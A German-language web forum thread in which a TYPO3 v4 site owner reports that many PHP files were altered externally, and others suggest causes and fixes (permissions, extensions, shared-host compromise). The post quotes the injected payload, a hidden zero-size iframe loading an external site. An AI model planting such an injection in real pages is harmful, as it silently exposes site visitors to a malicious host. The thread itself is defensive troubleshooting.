php dateien von extern verändert?!

[punchy]

Als ich heute auf meine Seite wollte auf der Typo3 v4 läuft, musste ich folgendes feststellen;

Am Anfang kommen folgende Fehlermeldungen:

Code:

Warning: Cannot modify header information - headers already sent by (output started at /home/httpd/vhosts/ehc-taerbinu.ch/httpdocs/typo3conf/localconf.php:26) in /home/httpd/vhosts/ehc-taerbinu.ch/httpdocs/t3lib/class.t3lib_userauth.php on line 266
Warning: Cannot modify header information - headers already sent by (output started at /home/httpd/vhosts/ehc-taerbinu.ch/httpdocs/typo3conf/localconf.php:26) in /home/httpd/vhosts/ehc-taerbinu.ch/httpdocs/typo3/sysext/cms/tslib/class.tslib_fe.php on line 2767

Danach habe ich nachgeforscht und bin schlussendlich dem Problem auf die Spur gekommen: irgendwie war es jemandem möglich einige php Dateien der Typo3 installation von aussen zu ändern - wie genau weiss ich noch nicht, aber hoffentlich werd ich's durch den Provider erfahren.

Jedenfalls war bei vielen php Dateien der folgende String ganz am Schluss angehängt worden;

Code:

<html><iframe width=0 height=0 frameborder=0 src=http://www.o00o.info/portal/index.php?aff=manph marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>

Ich weiss das viele der betroffenen Dateien zu viele Lese-/Schreibrechte hatten - sprich z.B. localconf.php alles hatte was man geben kann...das muss ich noch alles korrigieren.


Sollte es aber trotzdem nicht möglich sein die php Dateien einfach so von aussen ohne mir nichts dir nichts zu verändern???

Hat jemand von euch auch schon so ein Problem gehabt das auf einmal einige php Dateien verändert wurden???


Komischerweise habe ich 3 unabhängige Typo3 v4 Installationen (...alle beim selben Provider) und bei allen drei wurden die phps verändert. :(

[Junior]

Mir selbst ist das noch nicht untergekommen. Ich habe aber gehört, dass es bei einigen CMS zu diesem Problem kam.

Ganz lieben Gruss

Junior

[maxhb]

Hat jemand von euch auch schon so ein Problem gehabt das auf einmal einige php Dateien verändert wurden???

Hatte mal ein ähnliches Problem, allerdings nicht mit TYPO3, sondern mit dem phpBB. Generell ist der TYPO3-Kern als relativ sicher anzusehen, im Gegensatz zu einigen Extensions. Welche Extensions verwendest Du in welcher Version? Welche TYPO3-Version?

Sollte es aber trotzdem nicht möglich sein die php Dateien einfach so von aussen ohne mir nichts dir nichts zu verändern???

So "mir nichts dir nichts" geht so etwas auch nicht. Dennoch kann duch problematische Extensions oder falsche / unglückliche Servereinstellungen ein Angreifer in die Lage versetzt werden Deine Dateien zu ändern.

Spannend wäre es zu sehen, ob andere Accounts auf dem selben Server (evtl. von anderen Kunden) ebenfalls gehackt wurden. Bei shared Webservern wird meist der komplette Server auf einmal kompromittiert. Schon mal Deinen provider darüber informiert? Evtl. kann der nachvollziehen, wie der Angriff abgelaufen ist.

CU
maxhb

[mstuebner]

[b]Sollte es aber trotzdem nicht möglich sein die php Dateien einfach so von aussen ohne mir nichts dir nichts zu verändern???

Eben dafür gibt die Zugriffrechte! Es gibt keinen Grund, warum irgendjemand auf den gewöhnlichen Dateien (also nicht temp*) Schreibrechte haben sollte. Damit kann das dann nicht mehr passieren.

Dass jemand über den T3-Core einsteigt halte ich auch für unwahrscheinlich. Aber dazu gibt es ja Logfiles.